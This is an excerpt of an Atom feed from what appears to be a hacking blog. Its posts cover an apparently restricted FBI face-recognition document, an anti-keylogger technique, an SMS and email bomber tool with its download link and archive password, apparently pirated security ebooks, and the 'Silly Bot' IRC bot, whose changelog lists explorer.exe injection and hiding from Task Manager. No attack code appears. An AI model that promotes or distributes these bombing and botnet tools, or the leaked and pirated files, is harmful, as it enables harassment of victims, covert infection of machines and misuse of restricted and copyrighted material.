* Built on open source frameworks&lt;br /&gt;
* Extensive support for plugins&lt;br /&gt;
* Will be available for Law Enforcement use free of charge&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;UFW Objectives&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Plan, design, prototype and demonstrate a face workstation which can be freely deployed by the FBI&lt;br /&gt;
&lt;br /&gt;
* Develop services which can be carried over to NGI for biometric processing &lt;br /&gt;
&lt;br /&gt;
* Employ a user experience design philosophy to develop UFW specifically for face examiners&lt;br /&gt;
&lt;br /&gt;
Permit examiners to:&lt;br /&gt;
&lt;br /&gt;
* Ingest, analyze and enhance images&lt;br /&gt;
&lt;br /&gt;
* Select sub-frames or sub-images areas for further analysis&lt;br /&gt;
&lt;br /&gt;
* Submit files to local and remote matching systems&lt;br /&gt;
&lt;br /&gt;
* Review, store and match search results&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/JDNPu&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;DOWNLOAD&amp;nbsp; &lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
PDF &amp;nbsp;30pg &amp;nbsp; 2.26mb&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/1006317409263728850/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2013/02/fbi-criminal-justice-information.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/1006317409263728850'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/1006317409263728850'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2013/02/fbi-criminal-justice-information.html' title='FBI Criminal Justice Information Services Division Next Generation Identification'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3J1cgz1eGqsO3pJkRSoJ195YIQllHMe40x6kfEGdXp0-y5EwKP6_I2Gqla6upy-0Z43rLTfA3K06x4zsJAupVzB9bbeqsJpKl7PXoGGmL2zlV8F7kJeZF6ftmFwfMUexVMeEBK-1er90/s72-c/FBI-NGI-FOUO.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-6004725315418390789</id><published>2013-02-14T07:03:00.000-08:00</published><updated>2013-02-14T07:16:46.004-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Anti-keylogger"/><category scheme="http://www.blogger.com/atom/ns#" term="antikeylogger source code"/><title type='text'>Anti-Keylogger For Life! with [SOURCE CODE]</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h2&gt;
Introduction&amp;nbsp;&amp;nbsp;&lt;/h2&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1227rMts4mUQK35ese0eRT4HvNyoTQMwYuU6_P2w5orWPHrNhH4446Axw6FKqOdJpwLP0v5TVETviedi6Zthpn3NAg37K0p_hSCXgZ0DV2wIpdnoegSVvwcAPR6yhkyW57toYccqCsEE/s1600/anti-keylogger.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;257&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1227rMts4mUQK35ese0eRT4HvNyoTQMwYuU6_P2w5orWPHrNhH4446Axw6FKqOdJpwLP0v5TVETviedi6Zthpn3NAg37K0p_hSCXgZ0DV2wIpdnoegSVvwcAPR6yhkyW57toYccqCsEE/s320/anti-keylogger.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;span id=&quot;result_box&quot; lang=&quot;en&quot; tabindex=&quot;-1&quot;&gt;&lt;span class=&quot;hps&quot;&gt;If you usually&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;typing&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;a password&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;a desktop application&lt;/span&gt;, it &lt;span class=&quot;hps&quot;&gt;may be that&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;a keylogger&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;spies out&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;your secrets&lt;/span&gt;. &lt;span class=&quot;hps&quot;&gt;This is obviously&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;not good. &lt;/span&gt;&lt;span class=&quot;hps&quot;&gt;Screen keyboards&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;might&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;be a good solution&lt;/span&gt;, but again, there &lt;span class=&quot;hps&quot;&gt;could be a&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;screen capture&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;program&lt;/span&gt; which watches &lt;span class=&quot;hps&quot;&gt;effortlessly&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;your passwords&lt;/span&gt;. &lt;span class=&quot;hps&quot;&gt;Furthermore,&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;screen keyboards&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;are&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;relative unhandily&lt;/span&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;span id=&quot;result_box&quot; lang=&quot;en&quot; tabindex=&quot;-1&quot;&gt;&lt;span class=&quot;hps&quot;&gt;The following&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;article&lt;/span&gt; presents&lt;span class=&quot;hps&quot;&gt; a relatively simple&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;principle&lt;/span&gt;, &lt;span class=&quot;hps&quot;&gt;which&lt;/span&gt; prevents &lt;span class=&quot;hps&quot;&gt;the keylogger&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;to write down&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;passwords entered&lt;/span&gt;. &lt;span class=&quot;hps&quot;&gt;Basically, the&lt;/span&gt; used &lt;span class=&quot;hps&quot;&gt;system&lt;/span&gt; i&lt;span class=&quot;hps&quot;&gt;s&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;surprisingly easy and&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;can&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;therefore be transferred to&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;other programming&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;/ operating systems&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;/ platforms,&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;although&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;under&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;a small&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;limitation&lt;/span&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;h2&gt;
Background&amp;nbsp;&lt;/h2&gt;
The first question is: How can a program &lt;i&gt;hide &lt;/i&gt;keystrokes?
 Perhaps there are some difficult ways to do this, but most probable 
this is not possible. We create an assumption: Entered characters 
necessarily mean the keylogger sees them. And that&#39;s what we use against
 the keylogger.  &lt;br /&gt;
The second question is: How can a program &lt;i&gt;generate&lt;/i&gt; keystrokes? This is normally possible. For example, we use in C# the class &lt;code&gt;SendKeys&lt;/code&gt;,
 which provides methods for sending keystrokes. By the way, there can be
 the mentioned limitation because a website has not the authorization to
 produce keystrokes.&lt;br /&gt;
The third question is: How can we &lt;i&gt;combine&lt;/i&gt;
 these two statements? At every time when the user types a character, 
the program generates some keytrokes more. The keylogger write down all 
characters both from user and program, but only the user and the program
 know the entire password. Unauthorized third parties see only letter 
salad and they can not decrypt the main password.&lt;br /&gt;
The fourth question is: Is this main system &lt;i&gt;100 % secure&lt;/i&gt;?
 Surprisingly and unfortunately no. The prinziple has many weak points, 
but there are also many solutions to close these gaps. I advise every 
developer to think about it before they add this concept to their code. 
Let me explain you the &lt;span id=&quot;result_box&quot; lang=&quot;en&quot;&gt;&lt;span class=&quot;hps&quot;&gt;vulnerabilities and the solutions:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;&lt;span id=&quot;result_box&quot; lang=&quot;en&quot;&gt;
 Creating random keystrokes after every character allows attackers to 
reproduce the typed password. Therefore the program must create 
identical keystrokes. Then again the produced keystrokes should not be 
identical for all passwords. In summary, we need a algorithm, which 
produces for every character always the same keystrokes. In addition to 
this, the length of the generated keystrokes should vary.&lt;/span&gt; &lt;/li&gt;
&lt;li&gt;&lt;span id=&quot;result_box&quot; lang=&quot;en&quot;&gt;For
 all that, an attacker can create a table with all characters and their 
hash result either by reverse engineering or by testing. Using this 
table, he can decrypt the password relatively easy. To prevent this, the
 generated keystrokes should depend on a password identity, such as 
account name, account number, e-mail or computer specification. &lt;/span&gt;&lt;span id=&quot;result_box&quot; lang=&quot;en&quot;&gt;&lt;span class=&quot;hps&quot;&gt;Unfortunately, this is&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;only an obstacle&lt;/span&gt;, &lt;span class=&quot;hps&quot;&gt;but&lt;/span&gt; &lt;span class=&quot;hps alt-edited&quot;&gt;no blockage&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;attackers&lt;/span&gt;. &lt;/span&gt;&lt;span id=&quot;result_box&quot; lang=&quot;en&quot;&gt; &lt;/span&gt;&lt;span id=&quot;result_box&quot; lang=&quot;en&quot;&gt; &lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
Download&amp;nbsp;&lt;/h2&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
&amp;nbsp;&lt;a href=&quot;http://adf.ly/J6BdG&quot; target=&quot;_blank&quot;&gt;Mediafire-download&lt;/a&gt;&lt;/h4&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
&amp;nbsp;&lt;/h4&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
&amp;nbsp;Credit: &lt;b&gt;Michael Hudak -&lt;/b&gt;SourceCode &lt;/h4&gt;
&amp;nbsp; &lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/6004725315418390789/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2013/02/anti-keylogger-for-life-with-source-code.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/6004725315418390789'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/6004725315418390789'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2013/02/anti-keylogger-for-life-with-source-code.html' title='Anti-Keylogger For Life! with [SOURCE CODE]'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1227rMts4mUQK35ese0eRT4HvNyoTQMwYuU6_P2w5orWPHrNhH4446Axw6FKqOdJpwLP0v5TVETviedi6Zthpn3NAg37K0p_hSCXgZ0DV2wIpdnoegSVvwcAPR6yhkyW57toYccqCsEE/s72-c/anti-keylogger.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-6852017945106171588</id><published>2012-09-17T06:30:00.000-07:00</published><updated>2012-09-18T22:50:46.351-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools And Programs"/><title type='text'>USA+International Free SMS + Email Bomber</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;b&gt;SCREEN SHOT: &lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsTNtL3VXnoDKHvTev_n9kKUcNU0hjWezVv3jcE8UhWJHN5yA3xFKjcNJ15vfhLQyHRwVeTw4WTBkAC_JkPO9Z_rIKXtKY1BNe-B8xmwzC8MAR2JIIxk-EZoq3tbGZkevgqGxHC7Oo_50/s1600/load_Emails.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsTNtL3VXnoDKHvTev_n9kKUcNU0hjWezVv3jcE8UhWJHN5yA3xFKjcNJ15vfhLQyHRwVeTw4WTBkAC_JkPO9Z_rIKXtKY1BNe-B8xmwzC8MAR2JIIxk-EZoq3tbGZkevgqGxHC7Oo_50/s320/load_Emails.jpg&quot; width=&quot;238&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPyAzrASGPHH9HwhPRq9s__wUua5MNgkdrsltV9MqwRQmmUiGhngzc7hkkvp3U3Ly0pzfcC0b3JWFptclb2gEY1saYoKjWzXydaKHyxG_yKkqCb8anF_hHeaQpL5pox02nWDSHAG8V6Hw/s1600/load_Victs.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;175&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPyAzrASGPHH9HwhPRq9s__wUua5MNgkdrsltV9MqwRQmmUiGhngzc7hkkvp3U3Ly0pzfcC0b3JWFptclb2gEY1saYoKjWzXydaKHyxG_yKkqCb8anF_hHeaQpL5pox02nWDSHAG8V6Hw/s320/load_Victs.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5kD08MLYlIM0CJwhesCb8t3oarrofe7I4NJzdUZrU987YLRPIj53Mlc-FEc7QhRah2cHCHjFX4Uv061Bhamj50NStkCPX2ruP6VwTXAnkz2MUHAgYGjYATLSsIe9T1vtNVuJPZBE6Juk/s1600/overview.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;160&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5kD08MLYlIM0CJwhesCb8t3oarrofe7I4NJzdUZrU987YLRPIj53Mlc-FEc7QhRah2cHCHjFX4Uv061Bhamj50NStkCPX2ruP6VwTXAnkz2MUHAgYGjYATLSsIe9T1vtNVuJPZBE6Juk/s320/overview.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisvu9Gxd8njbav6_3bkaKmj2ptiJN2BpPKJBP4YT7WfRExHYV5O2w23ERyyWWkUxUkLfmD7c6E0ehG4zFYFbjGRAh9_q9D1f3hII0bp2CQJAemYStjqOrbrTT8-qA57u-p0Wq2U2rtsoE/s1600/testing.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;238&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisvu9Gxd8njbav6_3bkaKmj2ptiJN2BpPKJBP4YT7WfRExHYV5O2w23ERyyWWkUxUkLfmD7c6E0ehG4zFYFbjGRAh9_q9D1f3hII0bp2CQJAemYStjqOrbrTT8-qA57u-p0Wq2U2rtsoE/s320/testing.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;DOWNLOAD:&lt;/b&gt;&lt;br /&gt;
http://adf.ly/CuiaK&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
PASSWORD:&lt;br /&gt;
openpass &lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://www.virustotal.com/file/af3cb2df9e83817f6a56e9515919c4c6788a50dc40ff9d11ee2092491e125a64/analysis/1312909496/&quot; target=&quot;_blank&quot;&gt;VIRUSTOTAL&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/6852017945106171588/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2012/09/usainternational-free-sms-email-bomber.html#comment-form' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/6852017945106171588'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/6852017945106171588'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2012/09/usainternational-free-sms-email-bomber.html' title='USA+International Free SMS + Email Bomber'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsTNtL3VXnoDKHvTev_n9kKUcNU0hjWezVv3jcE8UhWJHN5yA3xFKjcNJ15vfhLQyHRwVeTw4WTBkAC_JkPO9Z_rIKXtKY1BNe-B8xmwzC8MAR2JIIxk-EZoq3tbGZkevgqGxHC7Oo_50/s72-c/load_Emails.jpg" height="72" width="72"/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-8570398271874618896</id><published>2012-09-08T22:49:00.000-07:00</published><updated>2012-09-08T22:49:48.092-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Computer Security"/><category scheme="http://www.blogger.com/atom/ns#" term="ebooks"/><category scheme="http://www.blogger.com/atom/ns#" term="it security"/><category scheme="http://www.blogger.com/atom/ns#" term="penetration testing"/><title type='text'>Unauthorised Access - Physical Penetration Testing For IT Security Teams</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUjRW7ahj12wSYfmh6po7NkBzHcRgA3XSipRjpeSGYZfEcV8aXKnJiZ9htVlDGpDIoBQU5BBNErg8q4l-nrLkwEoosyVjwaTyYNelVxDgq7L_yqICbwQf2HQLS1YiLU0UBymYDdkQusFY/s1600/unauthorised-access-physical-penetration-testing-for-it-security-teams.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUjRW7ahj12wSYfmh6po7NkBzHcRgA3XSipRjpeSGYZfEcV8aXKnJiZ9htVlDGpDIoBQU5BBNErg8q4l-nrLkwEoosyVjwaTyYNelVxDgq7L_yqICbwQf2HQLS1YiLU0UBymYDdkQusFY/s400/unauthorised-access-physical-penetration-testing-for-it-security-teams.jpg&quot; width=&quot;321&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Book Description:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
The first guide to planning and performing a physical penetration test on your computer&#39;s security.&lt;br /&gt;
&lt;br /&gt;
Most IT security teams concentrate on keeping networks and systems safe 
from attacks from the outside-but what if your attacker was on the 
inside? While nearly all IT teams perform a variety of network and 
application penetration testing procedures, an audit and test of the 
physical location has not been as prevalent. IT teams are now 
increasingly requesting physical penetration tests, but there is little 
available in terms of training. The goal of the test is to demonstrate 
any deficiencies in operating procedures concerning physical security.&lt;br /&gt;
&lt;br /&gt;
Featuring a Foreword written by world-renowned hacker Kevin D. Mitnick 
and lead author of The Art of Intrusion and The Art of Deception, this 
book is the first guide to planning and performing a physical 
penetration test. Inside, IT security expert Wil Allsopp guides you 
through the entire process from gathering intelligence, getting inside, 
dealing with threats, staying hidden (often in plain sight), and getting
 access to networks and data.&lt;br /&gt;
&lt;br /&gt;
Teaches IT security teams how to break into their own facility in order 
to defend against such attacks, which is often overlooked by IT security
 teams but is of critical importance&lt;br /&gt;
&lt;br /&gt;
Deals with intelligence gathering, such as getting access building 
blueprints and satellite imagery, hacking security cameras, planting 
bugs, and eavesdropping on security channels&lt;br /&gt;
&lt;br /&gt;
Includes safeguards for consultants paid to probe facilities unbeknown to staff&lt;br /&gt;
&lt;br /&gt;
Covers preparing the report and presenting it to management&lt;br /&gt;
&lt;br /&gt;
In order to defend data, you need to think like a thief-let Unauthorised Access show you how to get inside.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Product Details&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
Paperback: 302 pages&lt;br /&gt;
Publisher: Wiley; 1 edition (September 29, 2009)&lt;br /&gt;
Language: English&lt;br /&gt;
Format: PDF&lt;br /&gt;
ISBN-10: 0470747617&lt;br /&gt;
ISBN-13: 978-0470747612&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Download:&lt;/b&gt;&lt;br /&gt;
http://www.mediafire.com/?6t1ws5guc8p2nl7 &lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/8570398271874618896/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2012/09/unauthorised-access-physical.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/8570398271874618896'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/8570398271874618896'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2012/09/unauthorised-access-physical.html' title='Unauthorised Access - Physical Penetration Testing For IT Security Teams'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUjRW7ahj12wSYfmh6po7NkBzHcRgA3XSipRjpeSGYZfEcV8aXKnJiZ9htVlDGpDIoBQU5BBNErg8q4l-nrLkwEoosyVjwaTyYNelVxDgq7L_yqICbwQf2HQLS1YiLU0UBymYDdkQusFY/s72-c/unauthorised-access-physical-penetration-testing-for-it-security-teams.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-4253310654038338090</id><published>2012-03-02T07:31:00.004-08:00</published><updated>2012-03-03T05:00:44.779-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="ebooks"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi WPA WEP Wireless Hacking"/><title type='text'>[ebook]Wireless Network Hacks &amp; Mods for Dummies</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span class=&quot;adbriteinline&quot;&gt;&lt;span name=&quot;KonaBody&quot;&gt;&lt;img class=&quot;limit_size&quot; src=&quot;http://i1062.photobucket.com/albums/t486/skytwohigh/wirelessnetworkhacksmod.jpg&quot; /&gt; &lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;Wireless Network Hacks &amp;amp; Mods for Dummies&lt;br /&gt; 359 pages | Publisher: For Dummies | English | ISBN-10: 0764595830 | PDF&lt;br /&gt; Connect the old, the new, the practical, and the fun!&lt;br /&gt;&lt;br /&gt;Play multiplayer games, set up home surveillance, or take your network outside&lt;br /&gt;&lt;br /&gt;Now
 that you&#39;ve got a wireless network going, you&#39;re getting the urge to 
see what else it can do, right? Hook up with this book and find simple, 
fun ways to expand its possibilities. Add your home entertainment gear, 
beef up speed and performance, discover wireless on the go, and get more
 out of your network!&lt;br /&gt;&lt;br /&gt;Discover how to:&lt;br /&gt; * Extend broadband throughout your home&lt;br /&gt; * Protect your network from snoops&lt;br /&gt; * Boost cellular signals&lt;br /&gt; * Set up a wireless hot spot&lt;br /&gt; * Take wireless to your car&lt;br /&gt; * Make calls with your wireless network and VoIP&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;adbriteinline&quot;&gt;&lt;span name=&quot;KonaBody&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;a href=&quot;http://www.mediafire.com/?83pn33mae4riekv&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;Download&lt;/b&gt;&lt;/a&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/4253310654038338090/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2012/03/ebookwireless-network-hacks-mods-for.html#comment-form' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/4253310654038338090'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/4253310654038338090'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2012/03/ebookwireless-network-hacks-mods-for.html' title='[ebook]Wireless Network Hacks &amp; Mods for Dummies'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-3478984063221008834</id><published>2012-02-27T06:52:00.002-08:00</published><updated>2012-02-27T06:52:35.417-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools And Programs"/><category scheme="http://www.blogger.com/atom/ns#" term="malware"/><title type='text'>Silly Bot 1.3.2 - C++ IRC Bot - New: Bugs Fixed from 1.3</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Silly Bot 1.3.2&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;&quot; border=&quot;0&quot; src=&quot;http://i.imgur.com/g4ZG8.png&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
What&#39;s New:&lt;br /&gt;
1.3.2&lt;br /&gt;
Fixed Ping/Pong&lt;br /&gt;
Fixed Join Cmd&lt;br /&gt;
1.3.1&lt;br /&gt;
Fixed build issue on XP&lt;br /&gt;
Fixed .Remove and .Kill function on x86  - Injected thread will still be running until reboot.  Bots will ping out of IRC.&lt;br /&gt;
1.3&lt;br /&gt;
Injects into explorer.exe if x86 detected - Runs hidden from task manger&lt;br /&gt;
Bin size reduced to ~35kb&lt;br /&gt;
Core recode to C (from C++), 99% in C with the exception of simple C++ syntax (So it compiles with WDK)&lt;br /&gt;
Builder offline again&lt;br /&gt;
Builder icon changed&lt;br /&gt;
Other stuff I can&#39;t think of... small changes&lt;br /&gt;
&lt;br /&gt;
Features:&lt;br /&gt;
IRC Bot&lt;br /&gt;
Compiled in C++&lt;br /&gt;
Small Size ~35kb&lt;br /&gt;
